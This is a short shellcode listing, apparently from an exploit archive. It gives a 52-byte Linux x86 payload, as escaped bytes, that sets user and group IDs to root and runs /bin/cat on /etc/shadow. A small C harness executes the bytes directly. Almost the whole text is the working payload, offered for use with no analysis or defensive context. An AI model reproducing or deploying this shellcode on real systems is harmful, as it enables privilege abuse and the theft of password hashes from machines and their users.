linux/x86 setuid(0) + setgid(0) + execve("/bin/cat", "/etc//shadow") - 52 by

// linux/x86 setuid(0) + setgid(0) + execve("/bin/cat", "/etc//shadow") - 52 bytes

// Febriyanto Nugroho

#include <stdio.h>

char shellcode[] = "\x6a\x17\x58\xcd\x80\x6a\x2e"

"\x58\xcd\x80\x6a\x0b\x58\x99"

"\x52\x68\x61\x64\x6f\x77\x68"

"\x2f\x2f\x73\x68\x68\x2f\x65"

"\x74\x63\x89\xe1\x52\x68\x2f"

"\x63\x61\x74\x68\x2f\x62\x69"

"\x6e\x89\xe3\x52\x51\x53\x89"

"\xe1\xcd\x80";

int main(int argc, char **argv) {

asm("jmp %0;" : "=m" (shellcode));

}

Rating